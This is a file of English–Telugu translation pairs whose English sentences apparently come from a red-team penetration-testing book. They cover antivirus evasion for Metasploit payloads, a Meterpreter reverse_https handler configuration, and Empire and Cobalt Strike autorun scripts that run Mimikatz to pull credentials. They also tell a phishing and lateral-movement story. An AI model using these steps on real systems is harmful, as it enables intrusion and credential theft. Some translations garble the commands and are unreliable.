| {"en":"Besides obfuscating our payload, we can also obfuscate the actual shellcode.","translation":"మా పేలోడ్ను అస్పష్టం చేయడంతో పాటు, మేము వాస్తవ షెల్కోడ్ను కూడా అస్పష్టం చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"One example is to go through all the Ruby files for the different payload types and add random nop sleds to avoid detection.","translation":"ఒక ఉదాహరణ ఏమిటంటే, విభిన్న పేలోడ్ రకాల కోసం అన్ని రూబీ ఫైల్లను పరిశీలించడం మరియు గుర్తింపును నివారించడానికి యాదృచ్ఛిక నోప్ స్లెడ్స్ను జోడించడం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"In this lab, we are going to take all of our modified Metasploit/Meterpreter code, recompile it, and make sure that it can evade basic AV detection.","translation":"ఈ ల్యాబ్లో, మేము మా సవరించిన మెటాస్ప్లోయిట్/మీటర్ప్రెటర్ కోడ్ను తీసుకుంటాము, దాన్ని మళ్లీ కంపైల్ చేస్తాము మరియు అది ప్రాథమిక AV గుర్తింపును తప్పించుకోగలదని నిర్ధారిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Start by pulling all the cyberspacekitten's repositories.","translation":"సైబర్స్పేస్కిటెన్ యొక్క అన్ని రిపోజిటరీలను లాగడం ద్వారా ప్రారంభించండి.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Although all the changes to modify strings, compile to clang, and payload nops are already made in these repositories, be sure to review the Metasploit diff between these two to see exactly what was changed.","translation":"స్ట్రింగ్లను సవరించడానికి, క్లాంగ్కు కంపైల్ చేయడానికి మరియు పేలోడ్ నోప్లకు సంబంధించిన అన్ని మార్పులు ఇప్పటికే ఈ రిపోజిటరీలలో చేయబడినప్పటికీ, ఏమి మార్చబడిందో ఖచ్చితంగా చూడటానికి ఈ రెండింటి మధ్య మెటాస్ప్లోయిట్ డిఫ్ను సమీక్షించాలని నిర్ధారించుకోండి.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Automating Metasploit with RC scripts With Metasploit, we can efficiently and effectively run our post-exploitation scripts using: Search all Post Exploitation Modules in Metasploit msfconsole show post","translation":"మెటాస్ప్లోయిట్ RC స్క్రిప్ట్లతో ఆటోమేట్ చేయడం: మెటాస్ప్లోయిట్తో, మేము మా పోస్ట్-ఎక్స్ప్లోయిటేషన్ స్క్రిప్ట్లను సమర్థవంతంగా మరియు ప్రభావవంతంగా అమలు చేయవచ్చు: మెటాస్ప్లోయిట్లో అన్ని పోస్ట్ ఎక్స్ప్లోయిటేషన్ మాడ్యూల్స్ను శోధించండి msfconsole show post","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"From the “post” results, select all the modules you want to include for auto-execution when receiving a Meterpreter Shell.","translation":"\"పోస్ట్\" ఫలితాల నుండి, మీటర్ప్రెటర్ షెల్ వచ్చినప్పుడు ఆటో-ఎగ్జిక్యూషన్ కోసం మీరు చేర్చాలనుకుంటున్న అన్ని మాడ్యూల్స్ను ఎంచుకోండి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"In this case, we are going to add a privilege migrate post exploitation (http://bit.ly/2vn1wFB) to our attack.","translation":"ఈ సందర్భంలో, మేము మా దాడికి ప్రివిలేజ్ మైగ్రేట్ పోస్ట్ ఎక్స్ప్లోయిటేషన్ (http://bit.ly/2vn1wFB)ని జోడించబోతున్నాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"To configure the Meterpreter Shell so that it runs this payload on the initial connection from our compromised host, we need to specify an AutoRunScript parameter.","translation":"మీటర్ప్రెటర్ షెల్ను కాన్ఫిగర్ చేయడానికి, ఇది రాజీపడిన హోస్ట్ నుండి ప్రారంభ కనెక్షన్లో ఈ పేలోడ్ను అమలు చేస్తుంది, మేము ఆటోరన్స్క్రిప్ట్ పారామీటర్ను పేర్కొనాలి.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Feel free to add as many AutoRunScripts as you need to dump information about the system/network, move laterally, and more!","translation":"సిస్టమ్/నెట్వర్క్ గురించి సమాచారాన్ని డంప్ చేయడానికి, పార్శ్వంగా తరలించడానికి మరియు మరిన్నింటి కోసం మీకు ఎన్ని ఆటోరన్స్క్రిప్ట్లు అవసరమో వాటిని జోడించడానికి సంకోచించకండి!","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Creating a Handler and AutoRunScript: Create a handler file gedit handler.rc Configure the handler and autorun scripts use multi/handler set payload windows/meterpreter/reverse_https set LHOST 10.100.100.9 set LPORT 443 set AutoRunScript post/windows/manage/priv_migrate set ExitOnSession false set EnableStageEncoding true exploit -j Start handler msfconsole -r handler.rc","translation":"హ్యాండ్లర్ మరియు ఆటోరన్స్క్రిప్ట్ను సృష్టించడం: హ్యాండ్లర్ ఫైల్ను సృష్టించండి gedit handler.rc హ్యాండ్లర్ మరియు ఆటోరన్ స్క్రిప్ట్లను కాన్ఫిగర్ చేయండి multi/handlerని ఉపయోగించండి పేలోడ్ విండోస్/మీటర్ప్రెటర్/రివర్స్_httpsని సెట్ చేయండి LHOST 10.100.100.9ని సెట్ చేయండి LPORT 443ని సెట్ చేయండి ఆటోరన్స్క్రిప్ట్ పోస్ట్/విండోస్/మేనేజ్/ప్రివ్_మైగ్రేట్ని సెట్ చేయండి ఎగ్జిట్ఆన్ సెషన్ తప్పు అని సెట్ చేయండి ఎనేబుల్ స్టేజ్ ఎన్కోడింగ్ నిజం అని సెట్ చేయండి ఎక్స్ప్లోయిట్ -j స్టార్ట్ హ్యాండ్లర్ msfconsole -r handler.rc","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Automating Empire Empire has similar features to Metasploit’s resource files, which automate many of the repetitive tasks.","translation":"ఆటోమేటింగ్ ఎంపైర్ ఎంపైర్ మెటాస్ప్లోయిట్ యొక్క వనరుల ఫైల్స్కు సమానమైన లక్షణాలను కలిగి ఉంది, ఇది పునరావృతమయ్యే అనేక పనులను స్వయంచాలకంగా చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"First, we need to create a file (in our example, we will create a file called /opt/empire_autoload.rc) and then load it within our Empire instance.","translation":"ముందుగా, మనం ఒక ఫైల్ను సృష్టించాలి (మా ఉదాహరణలో, మేము /opt/empire_autoload.rc అనే ఫైల్ను సృష్టిస్తాము) ఆపై దానిని మా ఎంపైర్ ఉదాహరణలో లోడ్ చేయాలి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"In a separate terminal window, create a handler file: gedit /opt/empire_autoload.rc Add all the post modules you want to execute:","translation":"ఒక ప్రత్యేక టెర్మినల్ విండోలో, ఒక హ్యాండ్లర్ ఫైల్ను సృష్టించండి: gedit /opt/empire_autoload.rc మీరు అమలు చేయాలనుకుంటున్న అన్ని పోస్ట్ మాడ్యూల్స్ను జోడించండి:","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"usemodule situational_awareness/network/powerview/get_user execute back usermodule situational_awareness/network/powerview/get_computer execute back Within Empire, load the autoload.rc resource file: agents autorun /opt/empire_autoload.rc powershell autorun show","translation":"usemodule situational_awareness/network/powerview/get_user execute back usermodule situational_awareness/network/powerview/get_computer execute back ఎంపైర్లో, ఆటోలోడ్.rc వనరుల ఫైల్ను లోడ్ చేయండి: ఏజెంట్లు ఆటోరన్ /opt/empire_autoload.rc పవర్షెల్ ఆటోరన్ చూపు","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"As you can see, when the agent connected, it automatically ran the get_user and get_computer PowerShell scripts.","translation":"మీరు చూడగలిగినట్లుగా, ఏజెంట్ కనెక్ట్ అయినప్పుడు, అది get_user మరియు get_computer పవర్షెల్ స్క్రిప్ట్లను స్వయంచాలకంగా అమలు చేసింది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"All the results of these scripts will be stored in the agent.log file.","translation":"ఈ స్క్రిప్ట్ల ఫలితాలన్నీ agent.log ఫైల్లో నిల్వ చేయబడతాయి.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"In this case, our agent name is N6LM348G, so our logs will be stored in /opt/Empire/downloads/N6LM348G/agent.log.","translation":"ఈ సందర్భంలో, మా ఏజెంట్ పేరు N6LM348G, కాబట్టి మా లాగ్లు /opt/Empire/downloads/N6LM348G/agent.logలో నిల్వ చేయబడతాయి.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Automating Cobalt Strike One of the main reasons that Cobalt Strike is so powerful is because of the Aggressor Scripts (https://www.cobaltstrike.com/aggressor-script/index.html).","translation":"కోబాల్ట్ స్ట్రైక్ను ఆటోమేట్ చేయడం కోబాల్ట్ స్ట్రైక్ చాలా శక్తివంతంగా ఉండటానికి ప్రధాన కారణాలలో ఒకటి అగ్రెసర్ స్క్రిప్ట్లు (https://www.cobaltstrike.com/aggressor-script/index.html).","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"With Cobalt Strike Aggressor Scripts, not only can you configure autorun style scripts, but you can also create very complex attacks.","translation":"కోబాల్ట్ స్ట్రైక్ అగ్రెసర్ స్క్రిప్ట్లతో, మీరు ఆటోరన్ స్టైల్ స్క్రిప్ట్లను కాన్ఫిగర్ చేయడమే కాకుండా, చాలా సంక్లిష్టమైన దాడులను కూడా సృష్టించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"For example, I often come across the situation where we get on a shared workstation, like a lab or conference room box.","translation":"ఉదాహరణకు, మేము ల్యాబ్ లేదా కాన్ఫరెన్స్ రూమ్ బాక్స్ వంటి షేర్డ్ వర్క్స్టేషన్ను పొందే పరిస్థితి తరచుగా ఎదురవుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"One thing I may want our agent to do is run Mimikatz every half hour to pull clear text credentials.","translation":"మా ఏజెంట్ చేయాలనుకునే ఒక విషయం ఏమిటంటే, స్పష్టమైన టెక్స్ట్ ఆధారాలను లాగడానికి ప్రతి అరగంటకు మిమికాట్ను అమలు చేయడం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"With Aggressor Scripts, we can do all these actions and more.","translation":"అగ్రెసర్ స్క్రిప్ట్లతో, మేము ఈ చర్యలన్నింటినీ మరియు మరిన్నింటినీ చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Here is an example script that does just that: mimikatz-every-30m.cna (http://bit.ly/2IXgIel).","translation":"అది చేసే ఉదాహరణ స్క్రిప్ట్ ఇక్కడ ఉంది: mimikatz-every-30m.cna (http://bit.ly/2IXgIel).","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"You laugh as you see that one of the users, Chris Catfield, used the password “Summer2018!”.","translation":"ఒక వినియోగదారుడు, క్రిస్ క్యాట్ఫీల్డ్, “సమ్మర్2018!” అనే పాస్వర్డ్ను ఉపయోగించడాన్ని చూసి మీరు నవ్వుకుంటారు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Next, you log into the forum as Chris, read through all his private messages and posts to figure out the best method to get your initial foothold.","translation":"తరువాత, మీరు క్రిస్గా ఫోరమ్లోకి లాగిన్ అవుతారు, అతని వ్యక్తిగత సందేశాలు మరియు పోస్ట్లన్నింటినీ చదివి, మీ ప్రారంభ స్థావరాన్ని పొందడానికి ఉత్తమమైన పద్ధతిని కనుగొంటారు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"You see that Chris regularly talks to another internal employee on the forum, Neil Pawstrong, about the space program.","translation":"క్రిస్ అంతర్గత ఉద్యోగి నీల్ పావ్స్ట్రాంగ్తో స్పేస్ ప్రోగ్రామ్ గురించి ఫోరమ్లో క్రమం తప్పకుండా మాట్లాడుతున్నాడని మీరు చూస్తారు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"It looks like they are not really friends, but have a good working relationship.","translation":"వారు నిజంగా స్నేహితులుగా లేనట్లు కనిపిస్తున్నారు, కానీ మంచి పని సంబంధం కలిగి ఉన్నారు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Using Chris' account, we already have the rapport between the two users and the likelihood of success is great.","translation":"క్రిస్ ఖాతాను ఉపయోగించి, ఇద్దరు వినియోగదారుల మధ్య ఇప్పటికే సంబంధం ఉంది మరియు విజయం సాధించే అవకాశం చాలా ఎక్కువ.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"You debate whether or not you should send Neil a custom malware payload, as that might be too obvious.","translation":"మీరు నీల్కు అనుకూలమైన మాల్వేర్ పేలోడ్ను పంపాలా లేదా వద్దా అని చర్చిస్తారు, ఎందుకంటే అది చాలా స్పష్టంగా ఉండవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Instead, you send a link to a cat photo webpage that you have stood up with the message, “Hey Neil, I know you love cats! Check out this page I made!”","translation":"బదులుగా, మీరు పిల్లి ఫోటో వెబ్పేజీకి లింక్ను పంపుతారు, మీరు “హే నీల్, మీకు పిల్లులంటే ఇష్టమని నాకు తెలుసు! నేను చేసిన ఈ పేజీని చూడండి!” అనే సందేశంతో నిలబడ్డాను.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"A few minutes later, you get a message back on the forum site from Neil that says, \"LOL, I love space cats!\"","translation":"కొన్ని నిమిషాల తరువాత, నీల్ నుండి ఫోరమ్ సైట్లో మీకు తిరిగి సందేశం వస్తుంది, \"LOL, నాకు స్పేస్ పిల్లులంటే చాలా ఇష్టం!\"","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Little did Neil realize that the webpage he visited had a custom JavaScript payload that ran code on his machine to scan his internal CSK network and compromise unauthenticated Jenkins and Tomcat webservers.","translation":"నీల్ సందర్శించిన వెబ్పేజీలో అనుకూల జావాస్క్రిప్ట్ పేలోడ్ ఉందని, అది అతని అంతర్గత CSK నెట్వర్క్ను స్కాన్ చేయడానికి మరియు ప్రమాణీకరించని జెన్కిన్స్ మరియు టామ్క్యాట్ వెబ్సర్వర్లను రాజీ చేయడానికి అతని మెషీన్లో కోడ్ను నడిపిస్తుందని నీల్ కొంచెం కూడా గ్రహించలేదు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Within a few seconds, you start to get Empire payloads back and let out a sigh of relief.","translation":"కొన్ని సెకన్లలో, మీరు ఎంపైర్ పేలోడ్లను తిరిగి పొందడం ప్రారంభిస్తారు మరియు ఉపశమనం పొందుతారు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"As your senses tingle, you know it is only a matter of time before the Blue Team starts putting in firewall/DNS/host blocks, so you have to move quickly.","translation":"మీ ఇంద్రియాలు జలదరిస్తున్నప్పుడు, బ్లూ టీమ్ ఫైర్వాల్/DNS/హోస్ట్ బ్లాక్లను ఉంచడానికి ఇది కొంత సమయం మాత్రమే అని మీకు తెలుసు, కాబట్టి మీరు త్వరగా కదలాలి.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Fortunately, you have already set up the automation to do a lot of the dirty work.","translation":"అదృష్టవశాత్తూ, మీరు ఇప్పటికే చాలా మురికి పనులు చేయడానికి ఆటోమేషన్ను ఏర్పాటు చేశారు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"The compromised host beacon activates and starts to run tools like Bloodhound, look for local passwords, set the registry bit to capture Mimikatz LSASS passwords, run SPN and dump all Kerberos tickets, and of course set up persistence in scheduled tasks.","translation":"రాజీపడిన హోస్ట్ బీకాన్ యాక్టివేట్ అవుతుంది మరియు బ్లడ్హౌండ్ వంటి సాధనాలను అమలు చేయడం ప్రారంభిస్తుంది, స్థానిక పాస్వర్డ్ల కోసం చూడండి, మిమికాట్జ్ LSASS పాస్వర్డ్లను సంగ్రహించడానికి రిజిస్ట్రీ బిట్ను సెట్ చేయండి, SPNని అమలు చేయండి మరియు అన్ని కెర్బెరోస్ టిక్కెట్లను డంప్ చేయండి మరియు కోర్సులో షెడ్యూల్ చేయబడిన టాస్క్లలో స్థిరత్వాన్ని ఏర్పాటు చేయండి.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"You know that you need to move quickly off this initial box.","translation":"మీరు ఈ ప్రారంభ పెట్టె నుండి త్వరగా కదలాలని మీకు తెలుసు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"You take all the Kerberos tickets and dump them into Hashcat to start cracking.","translation":"మీరు అన్ని కెర్బెరోస్ టిక్కెట్లను తీసుకుని క్రాకింగ్ ప్రారంభించడానికి వాటిని హాష్క్యాట్లోకి డంప్ చేస్తారు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"It's a good thing you found those extra bug bounties to buy a couple of 1080TI GPUs.","translation":"మీరు ఆ అదనపు బగ్ బౌంటీలను కనుగొనడం మంచిది, కొన్ని 1080TI GPUలను కొనుగోలు చేయడానికి.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"As they start cracking, you see some service account passwords popping up, but you don't have time for those yet.","translation":"వారు క్రాకింగ్ ప్రారంభించినప్పుడు, మీరు కొన్ని సర్వీస్ ఖాతా పాస్వర్డ్లు పాప్ అప్ అవుతున్నట్లు చూస్తారు, కానీ మీకు ఇంకా వాటి కోసం సమయం లేదు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"You review the Bloodhound output and realize that the compromised box belongs to Neil Pawstrong and that his AD account has access to Buzz Clawdrin's box.","translation":"మీరు బ్లడ్హౌండ్ అవుట్పుట్ను సమీక్షిస్తారు మరియు రాజీపడిన పెట్టె నీల్ పావ్స్ట్రాంగ్కు చెందినదని మరియు అతని AD ఖాతాకు బజ్ క్లాడ్రిన్ పెట్టెకు యాక్సెస్ ఉందని గ్రహించారు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Using WMI, you remotely spawn another payload onto his system and migrate into a process owned by Buzz.","translation":"WMIని ఉపయోగించి, మీరు అతని సిస్టమ్లో మరొక పేలోడ్ను రిమోట్గా స్పాన్ చేస్తారు మరియు బజ్ యాజమాన్యంలోని ప్రాసెస్లోకి వలస వెళతారు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Luckily for you, you are a local administrator on Buzz's box as well, which means they must do a lot of joint work.","translation":"అదృష్టవశాత్తూ, మీరు బజ్ పెట్టెలో స్థానిక నిర్వాహకులు కూడా, అంటే వారు చాలా ఉమ్మడి పని చేయాలి.","target_lang":"te","domain":"technical","complexity":"moderate"} |